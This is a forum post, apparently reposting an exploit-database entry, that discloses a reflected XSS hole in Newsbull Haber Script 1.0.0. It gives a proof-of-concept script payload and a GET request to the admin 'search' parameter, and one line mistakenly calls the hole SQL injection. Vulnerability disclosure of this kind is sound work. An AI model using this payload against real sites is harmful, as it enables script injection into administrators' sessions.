Newsbull Haber Script XSS Vuln.
by Adient - 05-30-2019, 10:55 PM
#1
####################################################################


# Exploit Title: Newsbull Haber Script - XSS Vulnerabilities
# Dork: N/A
# Date: 28-01-2019
# Exploit Author: Vicroity 
# Vendor Homepage: http://newsbull.org/
# Software Link: https://github.com/gurkanuzunca/newsbull
# Version: 1.0.0
# Category: Webapps
# Tested on: Wampp @Win
# CVE: N/A

####################################################################

# Vulnerabilities
# For the SQL injection to be applied, the user must log in.
# You can see the vulnerability by using the XSS code as specified in the poc section.
# The proof of the deficit is in the link below.
# https://i.hizliresim.com/4jaYlq.jpg
# https://i.hizliresim.com/mM2qLZ.jpg

####################################################################

# POC - XSS
# Parameters : search
# Attack Pattern : ‘"-- gt; lt;/style gt; lt;/Script gt; lt;Script gt;alert(0x007454) lt;/Script gt;
# GET Request : http://localhost/newsbull/admin/category/records?search=‘"-- gt; lt;/style gt; lt;/Script gt; lt;Script gt;alert(0x007454) lt;/Script gt; 

####################################################################
Reply

Possibly Related Threads…
Thread Author Replies Views Last Post
Rukovoditel PRM-CRM 2.4.1 SQL Vuln. Adient 0 103 05-30-2019, 10:54 PM
Last Post: Adient
Rukovoditel PRM-CRM 2.4.1 SQL Vuln. Adient 0 82 05-30-2019, 10:52 PM
Last Post: Adient
PilusCart 1.4.1 - SQL Vuln. storix 0 86 05-30-2019, 10:40 PM
Last Post: storix

 Users browsing this thread: 1 Guest(s)